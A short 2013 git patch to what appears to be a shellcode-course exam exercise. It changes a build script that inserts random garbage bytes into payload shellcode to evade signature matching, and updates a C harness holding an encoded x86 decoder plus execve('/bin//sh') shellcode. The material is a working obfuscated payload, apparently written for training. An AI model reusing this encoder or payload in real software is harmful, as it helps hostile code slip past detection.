From 7c2b91c0524972c2bc84bd1fa7a12b9f293a7dcc Mon Sep 17 00:00:00 2001
From: arno01 <andrey.arapov@gmail.com>
Date: Thu, 11 Apr 2013 15:16:58 +0200
Subject: [PATCH] minor updates

---
 exam4/make.sh     |   2 +-
 exam4/shellcode   | Bin 4980 -> 4980 bytes
 exam4/shellcode.c |   2 +-
 3 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/exam4/make.sh b/exam4/make.sh
index 66d2e3a..74bdc97 100755
--- a/exam4/make.sh
+++ b/exam4/make.sh
@@ -28,7 +28,7 @@ echo " [+] Encoding the payload shellcode ..."
 #
 
 garbage=('\x37' '\xFA' '\xD6' '\x3F');
-ENCPSHELLCODE=$(for i in $(objdump -d $SPAYLOAD |grep "^ " |cut -f2); do echo -n '\x'$i;  echo -n ${garbage[$[RANDOM%4]]}; done; echo -n "\xAF\"")
+ENCPSHELLCODE=$(for i in $(objdump -d $SPAYLOAD |grep "^ " |cut -f2); do echo -n '\x'$i;  echo -n ${garbage[$[$(shuf --random-source=/dev/urandom -z -i 999-999999 -n1)%4]]}; done; echo -n "\xAF\"")
 
 FULL_SHELLCODE=${DECODERSHELLCODE}${ENCPSHELLCODE}
 
diff --git a/exam4/shellcode b/exam4/shellcode
index 23fc6816381de91afce07048b1648f941d17453e..6e6b9ec62046523bd1acf2684ea5a2152d3af477 100755
GIT binary patch
delta 110
zcmV-!0FnRnCiEt-cmWhXV1KC6$qfKl^s{oOFoBLKae1e+i~)WHNBY3}us;hwG1k&Q
zQr2kJZZ|LbbNXo3Xx1-3FE?WPX+Me9<2O>)Q~HTN;rdcPi8tcb&DMbWF+adJu=)W%
QG5Xv3&H8{hvrz{l47{*6v;Y7A

delta 110
zcmV-!0FnRnCiEt-cmWiKB4z9>VF*tHBoRT|O$+;M1dwpEi~)WHM>oJfur~|VG5XR!
zQa@-vZu&3!bNXodX!<WVFZyEoX*Y@1<N8w8Q`U(;;nq^ti8tc<%{PG7G5Wwaur~oW
QF+bbZ%|C$pvrz{l46{)*djJ3c

diff --git a/exam4/shellcode.c b/exam4/shellcode.c
index 51293f1..41fdc72 100644
--- a/exam4/shellcode.c
+++ b/exam4/shellcode.c
@@ -1,7 +1,7 @@
 #include <stdio.h>
 #include <string.h>
 
-unsigned char code[] = "\xeb\x22\x5e\x31\xc9\x8a\x06\x46\x3c\x37\x74\xf9\x3c\xfa\x74\xf5\x3c\xd6\x74\xf1\x3c\x3f\x74\xed\x3c\xaf\x74\x06\x88\x04\x0a\x41\xeb\xe3\xff\xd2\xe8\xd9\xff\xff\xff\x31\x37\xc0\x3F\xb0\x37\x0b\xD6\x31\xFA\xd2\x3F\x52\x3F\x68\x3F\x6e\xFA\x2f\xFA\x73\xFA\x68\xFA\x68\xFA\x2f\x37\x2f\xFA\x62\xFA\x69\x37\x89\xD6\xe3\xFA\x52\xD6\x53\xD6\x89\x3F\xe1\xD6\x52\xD6\x89\x37\xe2\xFA\xcd\x37\x80\xD6\x31\xFA\xc0\x37\xb0\x37\x01\x37\x31\x3F\xdb\xD6\xcd\x3F\x80\xFA\xAF";
+unsigned char code[] = "\xeb\x22\x5e\x31\xc9\x8a\x06\x46\x3c\x37\x74\xf9\x3c\xfa\x74\xf5\x3c\xd6\x74\xf1\x3c\x3f\x74\xed\x3c\xaf\x74\x06\x88\x04\x0a\x41\xeb\xe3\xff\xd2\xe8\xd9\xff\xff\xff\x31\xFA\xc0\xFA\xb0\x3F\x0b\x3F\x31\xD6\xd2\x3F\x52\xD6\x68\xD6\x6e\x37\x2f\xFA\x73\xFA\x68\xD6\x68\xD6\x2f\x3F\x2f\x37\x62\xFA\x69\x3F\x89\xD6\xe3\x37\x52\xD6\x53\xFA\x89\x3F\xe1\xFA\x52\x3F\x89\x37\xe2\xD6\xcd\xD6\x80\xFA\x31\x3F\xc0\x37\xb0\xFA\x01\x3F\x31\xFA\xdb\xFA\xcd\xFA\x80\x37\xAF";
 
 main()
 {